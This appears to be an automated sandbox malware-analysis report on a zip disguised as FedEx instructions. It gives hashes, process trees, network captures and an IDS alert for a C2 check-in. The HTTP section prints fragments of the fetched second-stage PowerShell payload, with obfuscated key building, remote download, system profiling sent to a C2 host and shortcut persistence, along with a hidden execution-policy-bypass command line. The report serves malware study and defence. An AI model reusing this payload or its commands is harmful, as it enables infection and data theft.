            unknownUnited States
            63949LINODE-APLinodeLLCUStrue
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1542320
            Start date and time:2024-10-25 19:34:13 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 50s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsinteractivecookbook.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:25
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:VertusinstruccionesFedEX_66521.zip
            Detection:MAL
            Classification:mal60.evad.winZIP@13/4@1/2
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .zip
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, TextInputHost.exe
            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, evoke-windowsservices-tas.msedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • VT rate limit hit for: VertusinstruccionesFedEX_66521.zip
            TimeTypeDescription
            13:35:12API Interceptor38x Sleep call for process: powershell.exe modified
            13:36:18API Interceptor2x Sleep call for process: OpenWith.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            34.117.59.81UjbjOP.ps1Get hashmaliciousUnknownBrowse
            • ipinfo.io/json
            I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
            • ipinfo.io/json
            licarisan_api.exeGet hashmaliciousIcarusBrowse
            • ipinfo.io/ip
            build.exeGet hashmaliciousUnknownBrowse
            • ipinfo.io/ip
            YjcgpfVBcm.batGet hashmaliciousUnknownBrowse
            • ipinfo.io/json
            lePDF.cmdGet hashmaliciousUnknownBrowse
            • ipinfo.io/json
            6Mpsoq1.php.ps1Get hashmaliciousUnknownBrowse
            • ipinfo.io/json
            mjOiDa1hrN.batGet hashmaliciousUnknownBrowse
            • ipinfo.io/json
            8ym4cxJPyl.ps1Get hashmaliciousUnknownBrowse
            • ipinfo.io/json
            GKrKPXOkdF.zsb.dllGet hashmaliciousUnknownBrowse
            • ipinfo.io/json
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ipinfo.iokQyd2z80gD.exeGet hashmaliciousDCRatBrowse
            • 34.117.59.81
            sgc0e7HpH5.exeGet hashmaliciousUnknownBrowse
            • 34.117.59.81
            uHaQ34KPq5.exeGet hashmaliciousUnknownBrowse
            • 34.117.59.81
            wOP5sowoN1.exeGet hashmaliciousUnknownBrowse
            • 34.117.59.81
            oD0N44Ka53.exeGet hashmaliciousUnknownBrowse
            • 34.117.59.81
            sgc0e7HpH5.exeGet hashmaliciousUnknownBrowse
            • 34.117.59.81
            uHaQ34KPq5.exeGet hashmaliciousUnknownBrowse
            • 34.117.59.81
            F1NlcL6Ly7.exeGet hashmaliciousUnknownBrowse
            • 34.117.59.81
            SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cjar.14389.14563.exeGet hashmaliciousUnknownBrowse
            • 34.117.59.81
            SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cjar.14389.14563.exeGet hashmaliciousUnknownBrowse
            • 34.117.59.81
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            LINODE-APLinodeLLCUSw18Ys8qKuX.elfGet hashmaliciousUnknownBrowse
            • 103.3.63.198
            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
            • 172.105.113.2
            https://nimb.ws/uRSOy9qGet hashmaliciousHTMLPhisherBrowse
            • 198.58.104.63
            https://nimb.ws/uRSOy9qGet hashmaliciousHTMLPhisherBrowse
            • 198.58.104.63
            botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
            • 176.58.114.161
            MglAEOjknh.elfGet hashmaliciousOkiruBrowse
            • 45.79.240.146
            https://criminallawattorney.online/loganlowry/Get hashmaliciousHTMLPhisherBrowse
            • 173.255.201.45
            Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
            • 45.33.6.223
            SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
            • 45.33.6.223
            IND24072113.xlsxGet hashmaliciousUnknownBrowse
            • 45.33.6.223
            GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousUnknownBrowse
            • 34.117.188.166
            file.exeGet hashmaliciousUnknownBrowse
            • 34.117.188.166
            file.exeGet hashmaliciousUnknownBrowse
            • 34.117.188.166
            file.exeGet hashmaliciousUnknownBrowse
            • 34.117.188.166
            file.exeGet hashmaliciousUnknownBrowse
            • 34.117.188.166
            file.exeGet hashmaliciousUnknownBrowse
            • 34.117.188.166
            file.exeGet hashmaliciousUnknownBrowse
            • 34.117.188.166
            file.exeGet hashmaliciousUnknownBrowse
            • 34.117.188.166
            file.exeGet hashmaliciousCredential FlusherBrowse
            • 34.117.188.166
            file.exeGet hashmaliciousCredential FlusherBrowse
            • 34.117.188.166
            No context
            No context
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
            Category:dropped
            Size (bytes):44
            Entropy (8bit):4.570353994119938
            Encrypted:false
            SSDEEP:3:KOsHVvE2J5RPxJJc5vn:KOsHO23pxHKn
            MD5:1286AE708C94DEF8BF39F995ABB8957A
            SHA1:27425CDFE6790CAE6CF3FF3ABEF03749ED8EC23A
            SHA-256:9F1E5B513040BF12E7AB80CDA786097A3CA18ED07A1A84312CFFF2EE221BB3A0
            SHA-512:CE52BA699C4D0C09F30078807E8DFE16F710A80AE7D31EF4AE18C9EC5D1F058DF9546D1F7D6D4C1FB18BFDF88C059F62D1E3EFFE31DA76F462C8AA2EEF58D8D3
            Malicious:false
            Preview:.C:\Users\user\AppData\Local\4jTskl903..
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):23032
            Entropy (8bit):5.533719774293647
            Encrypted:false
            SSDEEP:384:6kkjr3vTMubDdSfSeTpv56Xp3D4XYsh8OIvdPZ7nTafDmuuuaysZlZuKDS8ea6r:jWr3bMceTmX/shwxBTaip7V+Jr
            MD5:C89BF234C4DCC44BD140F761CCE7ABE6
            SHA1:327FBF00BDCE6C30CCB2097F9692E74E7880608E
            SHA-256:6C9C7D60EF9BB5EF76D7382ABA9E3965704FED2FA77A7A4FB4B203364E63EBC1
            SHA-512:83B68B7EF346C046CE95771CB3743BA1672A18E798284494AD427C494DA56F7C92A774A94A065610902386F09F88E9B1026DB0F214A76C21817BB93B8D29490B
            Malicious:false
            Preview:@...e...............!...........................................H...............o..b~.D.poM...S..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            File type:Zip archive data, at least v2.0 to extract, compression method=deflate
            Entropy (8bit):7.995847107902641
            TrID:
            • ZIP compressed archive (8000/1) 99.91%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
            File name:VertusinstruccionesFedEX_66521.zip
            File size:2'925'285 bytes
            MD5:f76879ad44a025bd87fa9951f125a3b8
            SHA1:273d89047f6d6af1c5188961105ae5e19f196eaf
            SHA256:f61dd9278bc465eb881e220a47152e0b731c909c2d7e3b9e8e7725177a8ee32c
            SHA512:56934e3d939ce0240547d78a5ed2af60e2f0cedae6dee279978377686759965c5549b5ee88bece987b4fc53c50490bfb63feb15e429d27ebbcf99e20b8c531dd
            SSDEEP:49152:Db+erTdccyywBR7b4uR/pF5SSWsKVbX5ZGPfiZw2li6KXhZGRqUHpDiPZv4oza4w:OerTdlwBR7r5gZGPklIxZaJe5LzhED
            TLSH:CBD53321AFB3EC498C35D324235D0D2A4A578E0074E76C47D71DA1CD64A352FDB9E2AB
            File Content Preview:PK..........YY............)...VertusinstruccionesFedEX_NHJzl5uIzstD.cmd..k.u.r......Q.-....kW..D..p....`..........$8...=s+.}......O{.s.9........../........................O..o..........q......?..o......7..<...O...............\.+........?..................
            Icon Hash:1c1c1e4e4ececedc
            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
            2024-10-25T19:35:16.976472+02002055903ET MALWARE PS1/ExfiltracaoBot CnC Checkin1192.168.2.174970845.79.204.1298901TCP
            TimestampSource PortDest PortSource IPDest IP
            Oct 25, 2024 19:35:14.867475033 CEST4970680192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:14.873106956 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:14.873212099 CEST4970680192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:14.873848915 CEST4970680192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:14.879292011 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:15.507841110 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:15.507859945 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:15.507997036 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:15.508001089 CEST4970680192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:15.508042097 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:15.508059978 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:15.508086920 CEST4970680192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:15.508141041 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:15.508156061 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:15.508172035 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:15.508193016 CEST4970680192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:15.508217096 CEST4970680192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:15.510466099 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:15.510499001 CEST804970645.79.204.129192.168.2.17
            Oct 25, 2024 19:35:15.510551929 CEST4970680192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:16.266155958 CEST4970780192.168.2.1734.117.59.81
            Oct 25, 2024 19:35:16.271579981 CEST804970734.117.59.81192.168.2.17
            Oct 25, 2024 19:35:16.271701097 CEST4970780192.168.2.1734.117.59.81
            Oct 25, 2024 19:35:16.271769047 CEST4970780192.168.2.1734.117.59.81
            Oct 25, 2024 19:35:16.277107000 CEST804970734.117.59.81192.168.2.17
            Oct 25, 2024 19:35:16.887871981 CEST804970734.117.59.81192.168.2.17
            Oct 25, 2024 19:35:16.937972069 CEST4970780192.168.2.1734.117.59.81
            Oct 25, 2024 19:35:16.945875883 CEST497088901192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:16.951661110 CEST89014970845.79.204.129192.168.2.17
            Oct 25, 2024 19:35:16.951754093 CEST497088901192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:16.976471901 CEST497088901192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:16.981797934 CEST89014970845.79.204.129192.168.2.17
            Oct 25, 2024 19:35:17.617609978 CEST89014970845.79.204.129192.168.2.17
            Oct 25, 2024 19:35:17.617749929 CEST497088901192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:17.620362997 CEST497088901192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:17.625777960 CEST89014970845.79.204.129192.168.2.17
            Oct 25, 2024 19:35:17.995481968 CEST4970680192.168.2.1745.79.204.129
            Oct 25, 2024 19:35:17.995613098 CEST4970780192.168.2.1734.117.59.81
            TimestampSource PortDest PortSource IPDest IP
            Oct 25, 2024 19:35:16.257844925 CEST5012253192.168.2.171.1.1.1
            Oct 25, 2024 19:35:16.265538931 CEST53501221.1.1.1192.168.2.17
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Oct 25, 2024 19:35:16.257844925 CEST192.168.2.171.1.1.10x6e47Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Oct 25, 2024 19:35:16.265538931 CEST1.1.1.1192.168.2.170x6e47No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
            • 45.79.204.129
            • ipinfo.io
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.174970645.79.204.129805056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            Oct 25, 2024 19:35:14.873848915 CEST135OUTGET /contadores/TnZYN.php?iWY=EiwIZKlgmDJwbFobKM167awreInvomxL806TXsZdJznxUFO HTTP/1.1
            Host: 45.79.204.129
            Connection: Keep-Alive
            Oct 25, 2024 19:35:15.507841110 CEST1236INHTTP/1.1 200 OK
            Date: Fri, 25 Oct 2024 17:35:15 GMT
            Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
            X-Powered-By: PHP/5.6.39
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Transfer-Encoding: chunked
            Content-Type: text/html; charset=UTF-8
            Data Raw: 32 30 33 61 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 43 54 75 4e 35 41 42 73 78 20 7b 0a 20 20 20 20 70 61 72 61 6d 20 28 0a 20 20 20 20 20 20 20 20 5b 69 6e 74 5d 24 54 33 5a 64 30 55 4e 77 75 70 20 3d 20 24 61 72 67 73 5b 30 5d 0a 20 20 20 20 29 0a 0a 20 20 20 20 0a 20 20 20 20 24 44 4d 4d 42 68 50 78 37 6e 70 20 3d 20 28 36 35 2e 2e 39 30 29 20 2b 20 28 39 37 2e 2e 31 32 32 29 20 2b 20 28 34 38 2e 2e 35 37 29 0a 0a 20 20 20 20 24 43 33 58 6b 69 6f 46 63 76 70 20 3d 20 66 6f 72 65 61 63 68 20 28 24 76 30 63 41 31 6e 55 49 4c 36 20 69 6e 20 28 31 2e 2e 24 54 33 5a 64 30 55 4e 77 75 70 29 29 20 7b 0a 20 20 20 20 20 20 20 20 24 53 41 50 53 69 73 61 70 43 47 20 3d 20 47 65 74 2d 52 61 6e 64 6f 6d 20 2d 49 6e 70 75 74 4f 62 6a 65 63 74 20 24 44 4d 4d 42 68 50 78 37 6e 70 0a 20 20 20 20 20 20 20 20 5b 63 68 61 72 5d 24 53 41 50 53 69 73 61 70 43 47 0a 20 20 20 20 7d 0a 0a 20 20 20 20 72 65 74 75 72 6e 20 2d 6a 6f 69 6e 20 24 43 33 58 6b 69 6f 46 63 76 70 0a 7d 0a 0a 0a 66 75 6e 63 74 69 6f 6e 20 48 59 6e 6d [TRUNCATED]
            Data Ascii: 203afunction cCTuN5ABsx { param ( [int]$T3Zd0UNwup = $args[0] ) $DMMBhPx7np = (65..90) + (97..122) + (48..57) $C3XkioFcvp = foreach ($v0cA1nUIL6 in (1..$T3Zd0UNwup)) { $SAPSisapCG = Get-Random -InputObject $DMMBhPx7np [char]$SAPSisapCG } return -join $C3XkioFcvp}function HYnmE3aG0E { param ( [string]$FFF ) # Partes da chave em formato hexadecimal $i9z6Cvcidz = 0x35, 0x56, 0x41, 0x4E, 0x56, 0x34, 0x53, 0x44 $ist8rV02d6 = 0x4D, 0x43, 0x33, 0x56, 0x45, 0x41, 0x46, 0x52 $kD7w2GVA7v = 0x38, 0x53, 0x32, 0x4D, 0x33, 0x4D, 0x39, 0x55 $r3YUPW15nD = 0x36, 0x57, 0x52, 0x48, 0x33, 0x50, 0x37, 0x46 $S0urR0scof = 0x44, 0x44, 0x39, 0x54, 0x39, 0x51, 0x31, 0x30 $YeGybBpoSc = 0x49, 0x41, 0x47, 0x35, 0x57, 0x5A, 0x4A, 0x35 $JAbKtjyXXl = 0x4B, 0x35 # Converter cada parte para string $n46whRMbYX = ( [System.Text.Encoding]::ASCII.GetString($i9z6Cvcidz) +
            Oct 25, 2024 19:35:15.507859945 CEST212INData Raw: 0a 20 20 20 20 20 20 20 20 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 24 69 73 74 38 72 56 30 32 64 36 29 20 2b 0a 20 20 20 20 20 20 20 20 5b 53 79 73 74 65 6d 2e 54 65
            Data Ascii: [System.Text.Encoding]::ASCII.GetString($ist8rV02d6) + [System.Text.Encoding]::ASCII.GetString($kD7w2GVA7v) + [System.Text.Encoding]::ASCII.GetString($r3YUPW15nD) + [System.Text.E
            Oct 25, 2024 19:35:15.507997036 CEST1236INData Raw: 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 24 53 30 75 72 52 30 73 63 6f 66 29 20 2b 0a 20 20 20 20 20 20 20 20 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74
            Data Ascii: ncoding]::ASCII.GetString($S0urR0scof) + [System.Text.Encoding]::ASCII.GetString($YeGybBpoSc) + [System.Text.Encoding]::ASCII.GetString($JAbKtjyXXl) ) if ($FFF -eq '') { return '' } $uqCO8vVmDt = ''
            Oct 25, 2024 19:35:15.508042097 CEST1236INData Raw: 39 5a 4e 6e 4b 37 76 75 20 2b 20 24 4f 4b 48 70 49 56 4d 41 59 4f 0a 0a 20 20 20 20 24 46 39 62 61 49 66 62 48 65 79 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 0a 20 20 20 20 24 72 65 73
            Data Ascii: 9ZNnK7vu + $OKHpIVMAYO $F9baIfbHey = New-Object System.Net.WebClient $response = $F9baIfbHey.DownloadString($sIjsinJKPu) # Processa a resposta e remove caracteres desnecessrios $dbn0sWxZtv = $response -replace '"', '' -repla
            Oct 25, 2024 19:35:15.508059978 CEST1236INData Raw: 6c 4c 62 4c 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 20 65
            Data Ascii: lLbL) } else { Write-Host "" } } else { Write-Host "" } } # Retorna o hash de geolocalizao return $vCsfst9aC0}function YRak192Utb { $LhAOgXuYoX = HYnmE3a
            Oct 25, 2024 19:35:15.508141041 CEST1236INData Raw: 24 6c 64 74 63 75 61 51 4a 6c 50 2e 41 75 74 6f 46 6c 75 73 68 20 3d 20 24 74 72 75 65 0a 20 20 20 20 20 20 20 20 24 59 31 79 6a 61 72 4c 45 44 34 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 49 4f 2e 53 74 72 65 61 6d 52 65 61
            Data Ascii: $ldtcuaQJlP.AutoFlush = $true $Y1yjarLED4 = New-Object System.IO.StreamReader($J2ok94cXhu) $lVxsa20jJ4 = "$((Get-Date).ToString('dd/MM/yyyy HH:mm:ss')) | $CtOhD6c3Xg | $LJuk94pbDb | $dTTSNKw4rl | $CX02xNTb4z | $Uhm0H0
            Oct 25, 2024 19:35:15.508156061 CEST1236INData Raw: 44 69 73 70 6f 73 65 28 29 0a 20 20 20 20 20 20 20 20 24 50 38 70 54 64 33 51 49 37 4f 2e 44 69 73 70 6f 73 65 28 29 0a 20 20 20 20 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 22 0a 20 20 20 20 7d 0a
            Data Ascii: Dispose() $P8pTd3QI7O.Dispose() } catch { Write-Host "" }}$GUPNqTOWTz = $env:LOCALAPPDATA$yjO4jzlSxa = "$GUPNqTOWTz\$([System.DateTime]::Now.ToString('ddMM'))"$sSDydmKsTu = [System.IO.File]::Exists($yjO4jzlSxa)if
            Oct 25, 2024 19:35:15.508172035 CEST893INData Raw: 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 52 65 6d 6f 76 65 2d 49 74 65 6d 20 24 67 6c 6f 62 61 6c 3a 64 65 73 74 69 6e 61
            Data Ascii: } else { Write-Host "" Remove-Item $global:destinationFilePath } } $qw4rFWBQB4 = New-Object System.Collections.ArrayList $r5Tdf5Vk05 = New-Object -com shell.application $gkejG4yKLy = $r5
            Oct 25, 2024 19:35:15.510466099 CEST1236INData Raw: 39 37 61 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 68 44 31 38 79 7a 59 30 37 33 20 3d 20 24 68 7a 74 4a 41 69 34 6d 59 4b 5b 24 54 6b 6a 72 38 54 75 58 53 52 5d 20 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 20 4a 6f 69
            Data Ascii: 97a $hD18yzY073 = $hztJAi4mYK[$Tkjr8TuXSR] | ForEach-Object { Join-Path $AITrHB1udcPath $_ } $gBgM4KmJXA = $hD18yzY073 | Where-Object { $_ -match '\.exe$' } if ($gBgM4KmJXA) {
            Oct 25, 2024 19:35:15.510499001 CEST1202INData Raw: 68 6f 72 74 63 75 74 28 22 24 47 55 50 4e 71 54 4f 57 54 7a 5c 22 20 2b 20 24 58 30 75 6e 6e 57 42 6c 4a 6e 20 2b 20 24 4e 36 63 55 6f 69 77 55 43 50 29 0a 20 20 20 20 20 20 20 20 24 77 57 4d 74 6e 70 6a 34 61 50 2e 54 61 72 67 65 74 50 61 74 68
            Data Ascii: hortcut("$GUPNqTOWTz\" + $X0unnWBlJn + $N6cUoiwUCP) $wWMtnpj4aP.TargetPath = $GUuMv53R5Q $wWMtnpj4aP.Description = "" $wWMtnpj4aP.WorkingDirectory = $AITrHB1udcPath $wWMtnpj4aP.Save() Start-Process $G


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.174970734.117.59.81805056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            Oct 25, 2024 19:35:16.271769047 CEST63OUTGET /json HTTP/1.1
            Host: ipinfo.io
            Connection: Keep-Alive
            Oct 25, 2024 19:35:16.887871981 CEST583INHTTP/1.1 200 OK
            access-control-allow-origin: *
            Content-Length: 314
            content-type: application/json; charset=utf-8
            date: Fri, 25 Oct 2024 17:35:16 GMT
            x-content-type-options: nosniff
            via: 1.1 google
            strict-transport-security: max-age=2592000; includeSubDomains
            Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 54 65 78 61 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 33 32 2e 38 31 35 32 2c 2d 39 36 2e 38 37 30 33 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 37 35 32 34 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 0a 20 20 22 72 65 61 64 6d 65 22 3a 20 22 68 74 74 70 73 3a 2f 2f 69 70 69 6e 66 6f 2e 69 6f 2f 6d 69 73 73 69 6e 67 61 75 74 68 22 0a 7d
            Data Ascii: { "ip": "173.254.250.81", "hostname": "173.254.250.81.static.quadranet.com", "city": "Dallas", "region": "Texas", "country": "US", "loc": "32.8152,-96.8703", "org": "AS8100 QuadraNet Enterprises LLC", "postal": "75247", "timezone": "America/Chicago", "readme": "https://ipinfo.io/missingauth"}


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:2
            Start time:13:34:58
            Start date:25/10/2024
            Path:C:\Windows\System32\rundll32.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Imagebase:0x7ff765870000
            File size:71'680 bytes
            MD5 hash:EF3179D498793BF4234F708D3BE28633
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:8
            Start time:13:35:09
            Start date:25/10/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Temp1_VertusinstruccionesFedEX_66521.zip\VertusinstruccionesFedEX_NHJzl5uIzstD.cmd" "
            Imagebase:0x7ff6a1800000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:13:35:09
            Start date:25/10/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff772470000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:10
            Start time:13:35:09
            Start date:25/10/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo %PCzmjQH8jota% "
            Imagebase:0x7ff6a1800000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:11
            Start time:13:35:09
            Start date:25/10/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:cmd.exe /c powershell.exe -exec bypass -nop -win 1 -
            Imagebase:0x7ff6a1800000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:12
            Start time:13:35:09
            Start date:25/10/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
